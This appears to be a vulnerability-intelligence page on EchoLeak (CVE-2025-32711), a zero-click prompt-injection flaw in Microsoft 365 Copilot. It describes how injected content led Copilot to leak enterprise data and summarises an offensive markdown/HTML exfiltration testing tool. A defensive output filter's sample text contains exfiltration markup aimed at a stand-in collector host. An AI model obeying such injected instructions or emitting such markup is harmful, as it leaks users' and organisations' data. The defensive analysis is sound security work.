EchoLeak: AI command injection in Microsoft 365 Copilot
CVE-2025-32711 is a critical information disclosure vulnerability in Microsoft 365 Copilot caused by AI command injection, also referred to publicly as EchoLeak. Microsoft describes the issue as allowing an unauthorized attacker to disclose information over a network. Supporting content indicates this was a zero-click, indirect prompt-injection scenario in which attacker-controlled content, such as a crafted email containing hidden or specially formatted instructions, could be ingested by Copilot through its retrieval and summarization workflows. The malicious content could then influence Copilot to retrieve sensitive enterprise data from connected Microsoft 365 sources such as Outlook, Teams, OneDrive, and SharePoint and include or transmit that data in attacker-influenced outbound content. Additional reporting cited in the content describes bypass techniques involving hidden text, reference-style Markdown, auto-fetched images, and trusted Microsoft domains or proxies, but Microsoft’s advisory itself provides only the high-level classification of AI command injection and information disclosure.
Exploits
1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository is a real offensive security testing tool rather than a simple detector or README-only project. It is a Node.js CLI utility named valtik-markdown-exfil-tester that targets the markdown/HTML exfiltration class affecting LLM-backed chatbots, especially where prompt injection causes the model to emit renderable markdown or HTML that triggers browser-side fetches. The core capability is to prove whether a chatbot/frontend combination can be induced to fetch attacker-controlled URLs and leak marker data through query parameters.
Repository structure is compact and modular. The main entry point is src/cli.js, which parses arguments, starts the local sink, loads payloads, optionally launches Playwright, delivers payloads, renders responses, classifies results, and prints reports. src/sink.js implements a localhost-only HTTP listener on 127.0.0.1 with a random or user-specified port; it records request metadata including path, query, headers, referer, IP, and user-agent. src/browser.js wraps Playwright Chromium to render arbitrary HTML/markdown and capture outbound and failed requests, enabling distinction between successful fetches and blocked attempts. src/classify.js correlates sink hits, browser requests, failed requests, and LLM response text to classify each payload as confirmed, browser-tried, llm-emitted, refused, or inconclusive.
Delivery logic is split into two modes. src/deliver/direct.js performs direct POST submission to a chatbot endpoint using several common API request shapes: OpenAI-style chat completions, Anthropic-style messages, simple JSON message/prompt bodies, and form-encoded q=. It extracts response text heuristically from multiple common JSON response formats or SSE/plain text. src/deliver/indirect-doc.js supports indirect prompt injection by generating markdown documents containing payloads, writing them to disk for later upload into a target knowledge base, RAG source, support system, or similar ingestion path, then waiting for sink hits tagged with the payload ID.
The payload library in src/payloads/library.json is the main exploit content. It contains a broad set of render-side exfil vectors: markdown images, reference-style links and images, raw HTML img tags, srcset, SVG image href/xlink, iframe, object, embed/media-related tags, form-related vectors, and prompt-wrapped social-engineering payloads that explicitly instruct the LLM to reproduce the malicious markup. Templates substitute a sink URL, sink host, payload ID, and a placeholder secret token (SECRET_PROBE). This makes the tool operational rather than a bare PoC, though payload customization is still relatively simple and local.
Notable network/target behavior: the tool does not hardcode an external attacker server; instead it creates a local HTTP sink at 127.0.0.1:<port> and points payloads there for correlation. The actual remote target is user-supplied as <chatbot-url> and optionally --endpoint. In direct mode it sends POST requests to the target endpoint. In browser-assisted mode it renders returned content locally and observes whether the browser attempts to fetch the sink URL. The tool also records referer values, which can help demonstrate what page or thread triggered the exfil attempt.
Overall, this repository is best characterized as an operational black-box exploit/testing harness for browser-mediated markdown/HTML exfiltration in LLM chatbot ecosystems. It is not malware and does not steal real secrets by default, but it is clearly exploit-oriented: it automates payload delivery, render-side triggering, network capture, and severity classification for a known vulnerability class associated with CVE-2025-32711 and similar issues.
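The defender-side counterpart to the render-side vectors described above, as an added example that is not code from the tool or from the original page: an output filter that finds URLs a renderer would fetch or link from model output and neutralizes those not plainly allowed. APP_ORIGIN, ALLOWED_HOSTS, the collector.invalid host and the sample text are constructed assumptions; SECRET_PROBE is the placeholder token the page mentions.

```javascript
// Added example: output-side check for render-time fetches in LLM responses.
// APP_ORIGIN, ALLOWED_HOSTS and the sample text are constructed assumptions.
const APP_ORIGIN = "https://chat.example-corp.test/";
const ALLOWED_HOSTS = new Set(["chat.example-corp.test", "static.example-corp.test"]);

const PATTERNS = [
  ["md-image", /!\[[^\]]*\]\(\s*<?([^)\s>]+)/g],            // ![alt](url)
  ["md-link", /(?<!!)\[[^\]]*\]\(\s*<?([^)\s>]+)/g],        // [text](url)
  ["md-reference", /^ {0,3}\[[^\]]+\]:\s*<?([^\s>]+)/gm],   // [ref]: url
  ["html-attr", /\b(?:src|srcset|href|data)\s*=\s*["']?([^"'\s>]+)/gi],
];

// Verdict for one URL. Relative URLs resolve against the app's own origin,
// so a protocol-relative "//host/x" is judged by the host it really targets.
function classify(rawUrl) {
  let u;
  try { u = new URL(rawUrl, APP_ORIGIN); } catch { return "blocked"; }
  if (u.protocol !== "https:" || !ALLOWED_HOSTS.has(u.hostname)) return "blocked";
  // Allowlisted hosts can still relay data (the page notes trusted domains
  // and proxies were used as a bypass), so parameterized URLs need review.
  return u.search ? "review" : "allowed";
}

// Every URL a renderer could fetch or link from the model's output.
function scanResponse(text) {
  const findings = [];
  for (const [kind, re] of PATTERNS) {
    for (const m of text.matchAll(re)) findings.push({ kind, url: m[1], verdict: classify(m[1]) });
  }
  return findings;
}

// Replace anything not plainly allowed before the text reaches the renderer.
function neutralize(text) {
  let out = text;
  for (const f of scanResponse(text)) {
    if (f.verdict !== "allowed") out = out.split(f.url).join("about:blank#removed");
  }
  return out;
}

// Constructed model output mixing inline, reference-style and HTML vectors.
const SAMPLE = [
  "Here is your summary. ![logo](https://static.example-corp.test/logo.png)",
  "![status][s] and <img src=\"//collector.invalid/p.gif?d=SECRET_PROBE\">",
  "[s]: https://collector.invalid/i.png?d=SECRET_PROBE",
  "![t](https://static.example-corp.test/redirect?to=https%3A%2F%2Fcollector.invalid)",
].join("\n");
```

The regular expressions approximate Markdown and HTML parsing; a production filter would run on the renderer's parsed tree and be paired with a Content-Security-Policy that restricts image and frame sources.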
Recent activity
49 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A zero-click indirect prompt injection vulnerability in Microsoft 365 Copilot that can lead to cross-application data exfiltration via retrieved malicious content.
A prompt-injection-related vulnerability affecting Microsoft 365 Copilot that can be triggered via a malicious email to cause data leakage.
A prompt injection vulnerability in Microsoft 365 Copilot referenced as a prior example of Microsoft assigning a CVE to an AI prompt injection issue.
A zero-click prompt injection vulnerability in Microsoft 365 Copilot that could cause the agent to access and exfiltrate enterprise data without user interaction.